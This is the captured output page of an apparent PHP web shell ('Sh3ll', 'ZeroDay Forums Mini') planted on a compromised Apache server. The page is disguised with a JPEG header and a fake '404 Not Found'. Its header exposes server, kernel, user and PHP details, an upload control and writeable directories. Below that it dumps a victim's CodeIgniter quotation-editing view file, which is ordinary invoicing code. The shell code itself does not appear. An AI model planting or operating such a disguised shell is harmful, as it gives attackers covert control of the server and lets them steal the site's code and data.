����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/dashboard/views/quotation/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/adimi/application/modules/dashboard/views/quotation/edit_quotation_form.php
<?php defined('BASEPATH') OR exit('No direct script access allowed');?>
<!-- Customer js php -->
<script src="<?php echo base_url()?>my-assets/js/admin_js/json/customer.js.php" ></script>
<!-- Product invoice js -->
<script src="<?php echo base_url()?>my-assets/js/admin_js/json/product_invoice.js.php" ></script>
<!-- Invoice js -->
<script src="<?php echo base_url()?>my-assets/js/admin_js/invoice.js" type="text/javascript"></script>

<!-- Edit Quotation Start -->
<div class="content-wrapper">
    <section class="content-header">
        <div class="header-icon">
            <i class="pe-7s-note2"></i>
        </div>
        <div class="header-title">
            <h1><?php echo display('quotation_update') ?></h1>
            <small><?php echo display('quotation_update') ?></small>
            <ol class="breadcrumb">
                <li><a href="#"><i class="pe-7s-home"></i> <?php echo display('home') ?></a></li>
                <li><a href="#"><?php echo display('quotation') ?></a></li>
                <li class="active"><?php echo display('quotation_update') ?></li>
            </ol>
        </div>
    </section>

    <section class="content">
        <!-- Quotation report -->
        <div class="row">
            <div class="col-sm-12">
                <div class="panel panel-bd lobidrag">
                    <div class="panel-heading">
                        <div class="panel-title">
                            <h4><?php echo display('quotation_update') ?></h4>
                        </div>
                    </div>
                    <?php echo form_open('Cquotation/quotation_update',array('class' => 'form-vertical','id'=>'normalinvoice' ))?>
                    <div class="panel-body">
             
                        <div class="row">
                        	<div class="col-sm-6" id="">
                                <div class="form-group row">
                                    <label for="customer_name" class="col-sm-4 col-form-label"><?php echo display('customer_name') ?> <i class="text-danger">*</i></label>
                                    <div class="col-sm-8">
                                       <input type="text" name="customer_name" value="{customer_name}" class="form-control customerSelection" placeholder='<?php echo display('customer_name') ?>' required id="customer_name" required>

										<input type="hidden" class="customer_hidden_value" name="customer_id" value="{customer_id}" id="SchoolHiddenId"/>
                                    </div>
                                </div>
                            </div>
                            <div class="col-sm-6" id="store">
                                <div class="form-group row">
                                    <label for="store_id" class="col-sm-4 col-form-label">
                                    <?php echo display('store') ?>
                                     <i class="text-danger">*</i></label>
                                    <div class="col-sm-8">
                                       <select class="form-control" name="store_id" id="store_id">
                                           <option value=""></option>
                                           {store_list}
                                           <option value="{store_id}">{store_name}</option>
                                           {/store_list}
                                           {store_list_selected}
                                           <option value="{store_id}" selected="">{store_name}</option>
                                           {/store_list_selected}
                                       </select>
                                    </div>
                                </div>
                            </div>
                        </div>

                        <div class="row">
                        	<div class="col-sm-6">
                                <div class="form-group row">
                                    <label for="date" class="col-sm-4 col-form-label"><?php echo display('date') ?> <i class="text-danger">*</i></label>
                                    <div class="col-sm-8">
                                        <input type="text" tabindex="3" class="form-control datepicker" name="invoice_date" value="{date}" id="date"  required />
                                    </div>
                                </div>
                            </div>
                        </div>

                        <div class="table-responsive mt_10">
                            <table class="table table-bordered table-hover">
                                <thead>
                                	<tr>
                                		<th class="text-center"><?php echo display('item_information') ?> <i class="text-danger">*</i></th>
                                        <th class="text-center" width="130"><?php echo display('variant') ?> <i class="text-danger">*</i></th>
                                        <th class="text-center"><?php echo display('available_quantity') ?></th>
                                		<th class="text-center"><?php echo display('quantity') ?> <i class="text-danger">*</i></th>
                                		<th class="text-center"><?php echo display('rate') ?> <i class="text-danger">*</i></th>
                                		<th class="text-center"><?php echo display('discount') ?> <i class="text-danger">*</i></th>
                                		<th class="text-center"><?php echo display('total') ?> <i class="text-danger">*</i></th>
                                        <th class="text-center"><?php echo display('action') ?></th>
                                	</tr>
                                </thead>


	<tbody id="addinvoiceItem">
        <?php
        $i=0;
        if ($quotation_all_data) {
            foreach ($quotation_all_data as $value) {

            $i++;
            $cgst = null;
            $sgst = null;
            $igst = null;

            $sgst_tax_amount=0;
            $cgst_tax_amount=0;
            $igst_tax_amount=0;

            $cgst_value = $this->db->select('tcd.tax_id, tcd.amount, tcd.product_id, t.tax_name')
                ->from('quotation_tax_col_details AS tcd')
                ->join('tax AS t', 't.tax_id = tcd.tax_id', 'left')
                ->where('tcd.product_id',$value['product_id'])
                ->where('tcd.quotation_id',$value['quotation_id']) 
                ->where('tcd.variant_id',$value['variant_id'])
                ->where('t.tax_id','H5MQN4NXJBSDX4L') 
                ->get()
                ->row();
            
            $sgst_value = $this->db->select('tcd.tax_id, tcd.amount, tcd.product_id, t.tax_name')
                ->from('quotation_tax_col_details AS tcd')
                ->join('tax AS t', 't.tax_id = tcd.tax_id', 'left')
                ->where('tcd.product_id',$value['product_id'])
                ->where('tcd.quotation_id',$value['quotation_id']) 
                ->where('tcd.variant_id',$value['variant_id'])
                ->where('t.tax_id','52C2SKCKGQY6Q9J') 
                ->get()
                ->row();
            
            $igst_value = $this->db->select('tcd.tax_id, tcd.amount, tcd.product_id, t.tax_name')
                ->from('quotation_tax_col_details AS tcd')
                ->join('tax AS t', 't.tax_id = tcd.tax_id', 'left')
                ->where('tcd.product_id',$value['product_id'])
                ->where('tcd.quotation_id',$value['quotation_id']) 
                ->where('tcd.variant_id',$value['variant_id'])
                ->where('t.tax_id','5SN9PRWPN131T4V') 
                ->get()
                ->row();

            $cgst    = (!empty($cgst_value->tax_name)?$cgst_value->amount:null);
            $sgst    = (!empty($sgst_value->tax_name)?$sgst_value->amount:null);
            $igst    = (!empty($igst_value->tax_name)?$igst_value->amount:null);
            $cgst_id = (!empty($cgst_value->tax_id)?$cgst_value->tax_id:null);
            $sgst_id = (!empty($sgst_value->tax_id)?$sgst_value->tax_id:null);
            $igst_id = (!empty($igst_value->tax_id)?$igst_value->tax_id:null);

            $cgst_tax = $this->db->select('tcd.tax_id, tcd.tax_amount, t.tax_name')
                ->from('quotation_tax_col_summary AS tcd')
                ->join('tax AS t', 't.tax_id = tcd.tax_id', 'left')
                ->where('tcd.quotation_id',$value['quotation_id']) 
                ->where('t.tax_id','H5MQN4NXJBSDX4L') 
                ->get()
                ->row();

            $sgst_tax = $this->db->select('tcd.tax_id, tcd.tax_amount, t.tax_name')
                ->from('quotation_tax_col_summary AS tcd')
                ->join('tax AS t', 't.tax_id = tcd.tax_id', 'left')
                ->where('tcd.quotation_id',$value['quotation_id']) 
                ->where('t.tax_id','52C2SKCKGQY6Q9J') 
                ->get()
                ->row();

            $igst_tax = $this->db->select('tcd.tax_id, tcd.tax_amount, t.tax_name')
                ->from('quotation_tax_col_summary AS tcd')
                ->join('tax AS t', 't.tax_id = tcd.tax_id', 'left')
                ->where('tcd.quotation_id',$value['quotation_id']) 
                ->where('t.tax_id','5SN9PRWPN131T4V') 
                ->get()
                ->row();

            $sgst_tax_amount = (!empty($sgst_tax->tax_name)?$sgst_tax->tax_amount:0);
            $cgst_tax_amount = (!empty($cgst_tax->tax_name)?$cgst_tax->tax_amount:0);
            $igst_tax_amount = (!empty($igst_tax->tax_name)?$igst_tax->tax_amount:0);

            //Tax basic price
            $this->db->select('tax.*,tax_product_service.product_id,tax_percentage');
            $this->db->from('tax_product_service');
            $this->db->join('tax','tax_product_service.tax_id = tax.tax_id','left');
            $this->db->where('tax_product_service.product_id',$value['product_id']);
            $tax_information = $this->db->get()->result();

            if(!empty($tax_information)){
                foreach($tax_information as $k=>$v){
                   if ($v->tax_id == 'H5MQN4NXJBSDX4L') {
                        $tax['cgst_tax'] = ($v->tax_percentage)/100;
                        $tax['cgst_name']= $v->tax_name; 
                        $tax['cgst_id']  = $v->tax_id; 
                   }elseif($v->tax_id == '52C2SKCKGQY6Q9J'){
                        $tax['sgst_tax'] = ($v->tax_percentage)/100;
                        $tax['sgst_name']= $v->tax_name; 
                        $tax['sgst_id']  = $v->tax_id; 
                   }elseif($v->tax_id == '5SN9PRWPN131T4V'){
                        $tax['igst_tax'] = ($v->tax_percentage)/100;
                        $tax['igst_name']   = $v->tax_name; 
                        $tax['igst_id'] = $v->tax_id; 
                   }
                }
            }

            //Variant for per product
            $this->db->select('a.variants');
            $this->db->from('product_information a');
            $this->db->where(array('a.product_id' => $value['product_id'],'a.status' => 1)); 
            $product_information = $this->db->get()->row();
            $exploded = explode(',',$product_information->variants);

            //Stock available check from purchase
            $this->db->select('SUM(a.quantity) as total_purchase');
            $this->db->from('product_purchase_details a');
            $this->db->where('a.product_id',$value['product_id']);
            $this->db->where('a.variant_id',$value['variant_id']);
            $total_purchase = $this->db->get()->row();

            //Stock available check from invoice
            $this->db->select('SUM(b.quantity) as total_sale');
            $this->db->from('invoice_details b');
            $this->db->where('b.product_id',$value['product_id']);
            $this->db->where('b.variant_id',$value['variant_id']);
            $total_sale = $this->db->get()->row();
        ?>
		<tr>
			<td class="span3">
				<input type="text" name="product_name" onclick="invoice_productList(<?php echo $i?>);" value="<?php echo html_escape($value['product_name'])?>-<?php echo html_escape($value['product_model'])?>" class="form-control productSelection" required placeholder='<?php echo display('product_name') ?>' >

				<input type="hidden" class="autocomplete_hidden_value product_id_<?php echo $i?>" name="product_id[]" id="" value="<?php echo html_escape($value['product_id'])?>" />

            <input type="hidden" class="sl" value="<?php echo $i?>">

			</td>
            <td class="text-center">
                <select name="variant_id[]" id="variant_id_<?php echo $i?>" class="form-control width_100p variant_id" required="">
                <?php
                if ($exploded) {
                    foreach ($exploded as $elem) {
                        $this->db->select('*');
                        $this->db->from('variant');
                        $this->db->where('variant_id',$elem);
                        $this->db->order_by('variant_name','asc');
                        $result = $this->db->get()->row();
                ?>
                    <option value="<?php echo html_escape($result->variant_id)?>" <?php if($value['variant_id'] == $result->variant_id){echo "selected";}?>><?php echo html_escape($result->variant_name)?></option>
                <?php
                    }
                }
                ?>
                </select>
            </td>
            <td>
                <input type="text" name="available_quantity[]" id="avl_qntt_<?php echo $i?>" class="form-control text-right available_quantity_<?php echo $i?>" placeholder="0" readonly="1" value="<?php echo $total_purchase->total_purchase - $total_sale->total_sale?>"/>
            </td>
			<td class="text-right">
				<input type="number" name="product_quantity[]" onkeyup="quantity_calculate(<?php echo $i?>);" onchange="quantity_calculate(<?php echo $i?>);" value="<?php echo html_escape($value['quantity'])?>" id="total_qntt_<?php echo $i?>" class="form-control text-right" min="1" required="" />
			</td>
			<td>
				<input type="number" name="product_rate[]" onkeyup="quantity_calculate(<?php echo $i?>);" onchange="quantity_calculate(<?php echo $i?>);" value="<?php echo html_escape($value['rate'])?>" id="price_item_<?php echo $i?>" class="price_item<?php echo $i?> form-control text-right" required="" min="0" />
			</td>
			<td>
				<input type="number" name="discount[]" onkeyup="quantity_calculate(<?php echo $i?>);" onchange="quantity_calculate(<?php echo $i?>);" id="discount_<?php echo $i?>" class="form-control text-right" placeholder="Discount" value="<?php echo html_escape($value['discount'])?>" min="0" />
			</td>
			<td>
				<input class="total_price form-control text-right" type="text" name="total_price[]" id="total_price_<?php echo $i?>" value="<?php echo html_escape($value['total_price'])?>" readonly="readonly" />
				<input type="hidden" name="quotation_details_id[]" id="quotation_details_id" value="<?php echo html_escape($value['quotation_details_id'])?>"/>
			</td>
            <td>

                <?php
                    //Tax basic info
                    $this->db->select('*');
                    $this->db->from('tax');
                    $this->db->order_by('tax_name','asc');
                    $tax_information = $this->db->get()->result();

                    if(!empty($tax_information)){
                        foreach($tax_information as $k=>$v){
                           if ($v->tax_id == 'H5MQN4NXJBSDX4L') {
                                $tax['cgst_name']= $v->tax_name; 
                                $tax['cgst_id']  = $v->tax_id; 
                                $tax['cgst_status']  = $v->status; 
                           }elseif($v->tax_id == '52C2SKCKGQY6Q9J'){
                                $tax['sgst_name']= $v->tax_name; 
                                $tax['sgst_id']  = $v->tax_id; 
                                $tax['sgst_status']  = $v->status; 
                           }elseif($v->tax_id == '5SN9PRWPN131T4V'){
                                $tax['igst_name']   = $v->tax_name; 
                                $tax['igst_id']     = $v->tax_id; 
                                $tax['igst_status'] = $v->status; 
                           }
                        }
                    }
                ?>

                <!-- Tax calculate start-->
                <?php if ($tax['cgst_status'] ==1) { ?>
                    <input type="hidden" id="cgst_<?php echo $i?>" class="cgst" value="<?php echo (!empty($tax['cgst_tax'])?$tax['cgst_tax']:null)?>"/> 
                    <input type="hidden" id="total_cgst_<?php echo $i?>" class="total_cgst" name="cgst[]" value="<?php echo html_escape($cgst)?>"/> 
                    <input type="hidden" name="cgst_id[]" id="cgst_id_<?php echo $i?>" value="<?php echo html_escape($cgst_id)?>">
                <?php } if ($tax['sgst_status'] ==1) { ?> 
                    <input type="hidden" id="sgst_<?php echo $i?>" class="sgst" value="<?php echo (!empty($tax['sgst_tax'])?html_escape($tax['sgst_tax']):null)?>"/>
                    <input type="hidden" id="total_sgst_<?php echo $i?>" class="total_sgst" name="sgst[]" value="<?php echo html_escape($sgst)?>"/>
                    <input type="hidden" name="sgst_id[]" id="sgst_id_<?php echo $i?>" value="<?php echo html_escape($sgst_id)?>">
                <?php } if ($tax['igst_status'] ==1) { ?>
                    <input type="hidden" id="igst_<?php echo $i?>" class="igst" value="<?php echo (!empty($tax['igst_tax'])?html_escape($tax['igst_tax']):null)?>"/>
                    <input type="hidden" id="total_igst_<?php echo $i?>" class="total_igst" name="igst[]" value="<?php echo html_escape($igst)?>"/>
                    <input type="hidden" name="igst_id[]" id="igst_id_<?php echo $i?>" value="<?php echo html_escape($igst_id)?>">
                <?php } ?>
                <!-- Tax calculate end -->

                <input type="hidden" id="total_discount_<?php echo $i?>" class="" />
                <input type="hidden" id="all_discount_<?php echo $i?>" class="total_discount" value="<?php echo $value['discount'] * $value['quantity']?>"/>
                <!-- Discount calculate end -->

                <!-- Tax calculate end -->
                <button class="btn btn-danger text-right" type="button" value="<?php echo display('delete')?>" onclick="deleteRow(this)"><?php echo display('delete')?></button>
            </td>
		</tr>
        <?php
            }
        }
        ?>
	</tbody>

	<tfoot>
        <?php if ($tax['cgst_status'] ==1) { ?>
        <tr>
            <td class="text-right"  colspan="6"><b><?php echo html_escape($tax['cgst_name']) ?>:</b></td>
            <td class="text-right">
                <input type="text" id="total_cgst" class="form-control text-right" name="total_cgst" value="<?php echo  html_escape($cgst_tax_amount)?>" readonly="readonly" />
            </td>
        </tr>  
        <?php } if ($tax['sgst_status'] ==1) { ?>       
        <tr>
            <td class="text-right"  colspan="6"><b><?php echo html_escape($tax['sgst_name']) ?>:</b></td>
            <td class="text-right">
                <input type="text" id="total_sgst" class="form-control text-right" name="total_sgst" value="<?php echo  html_escape($sgst_tax_amount)?>" readonly="readonly" />
            </td>
        </tr>  
        <?php } if ($tax['igst_status'] ==1) { ?>      
        <tr>
            <td class="text-right"  colspan="6"><b><?php echo html_escape($tax['igst_name']) ?>:</b></td>
            <td class="text-right">
                <input type="text" id="total_igst" class="form-control text-right" name="total_igst" value="<?php echo  html_escape($igst_tax_amount)?>" readonly="readonly" />
            </td>
        </tr>
        <?php } ?>
        <tr>
            <td colspan="4"  rowspan="4">
                <label for="details" class=""><?php echo display('details')?></label>
                <textarea class="form-control" name="details" id="details" rows="6" placeholder="<?php echo display('details')?>">{details}</textarea>
            </td>
            <td class="text-right"  colspan="2"><b><?php echo display('product_discount') ?>:</b></td>
            <td class="text-right">
                <input type="text" id="total_discount_ammount" class="form-control text-right" name="total_discount" readonly="readonly" value="{total_discount}" />
            </td>
        </tr>
        <tr>
            <td class="text-right"  colspan="2"><b><?php echo display('quotation_discount') ?>:</b></td>
            <td class="text-right">
                <input type="text" id="invoice_discount" class="form-control text-right" name="invoice_discount" value="<?php if($quotation_discount){ echo $quotation_discount - $total_discount;}?>" onkeyup="calculateSum();" onchange="calculateSum();"/>
            </td>
        </tr>
        <tr>
            <td class="text-right"  colspan="2"><b><?php echo display('service_charge') ?>:</b></td>
            <td class="text-right">
                <input type="text" id="service_charge" class="form-control text-right" name="service_charge" value="<?php echo html_escape($service_charge)?>" onkeyup="quantity_calculate();" onchange="quantity_calculate();"/>
            </td>
        </tr>

        <tr>
            <td colspan="2"  class="text-right"><b><?php echo display('grand_total') ?>:</b></td>
            <td class="text-right">
                <input type="text" id="grandTotal" class="form-control text-right" name="grand_total_price" value="{total_amount}" readonly="readonly" />
            </td>
        </tr>
        <tr>
            <td align="center">
                <input type="button" id="add-invoice-item" class="btn btn-info valid" name="add-invoice-item" onclick="addInputField('addinvoiceItem');" value="Add New Item" aria-invalid="false">
                <input  class="btn btn-warning" name="" value="<?php echo display('full_paid') ?>" tabindex="15" onclick="full_paid();" type="button">

                <input type="hidden" name="baseUrl" class="baseUrl" value="<?php echo base_url();?>"/>
                <input type="hidden" name="quotation_id" id="quotation_id" value="{quotation_id}"/>
                <input type="hidden" name="quotation" id="quotation" value="{quotation}"/>
                <input type="hidden" name="status" id="status" value="{status}"/>

            </td>
            <td class="text-right"  colspan="5"><b><?php echo display('paid_ammount') ?>:</b></td>
            <td class="text-right">
                <input type="text" id="paidAmount" 
                onkeyup="invoice_paidamount();"  class="form-control text-right" name="paid_amount" value="{paid_amount}" />
            </td>
        </tr>
        <tr>
            <td align="center" class="width_220">
                <input type="submit" id="add-invoice" class="btn btn-success btn-large" name="add-invoice" value="<?php echo display('update') ?>" />
                
            </td>
          
            <td class="text-right"  colspan="5"><b><?php echo display('due') ?>:</b></td>
            <td class="text-right">
                <input type="text" id="dueAmmount" class="form-control text-right" name="due_amount" value="{due_amount}" readonly="readonly"/>
            </td>
        </tr>
	</tfoot>
                            </table>
                        </div>
                    </div>
                    <?php echo form_close()?>
                </div>
            </div>
        </div>
    </section>
</div>
<!-- Edit Quotation End -->
<input type="hidden" id="cgst_status" value="<?php echo html_escape($tax['cgst_status']); ?>">
<input type="hidden" id="sgst_status" value="<?php echo html_escape($tax['sgst_status']); ?>">
<input type="hidden" id="igst_status" value="<?php echo html_escape($tax['igst_status']); ?>">
<script src="<?php echo MOD_URL.'dashboard/assets/js/edit_quotation_form.js'; ?>"></script>

ZeroDay Forums Mini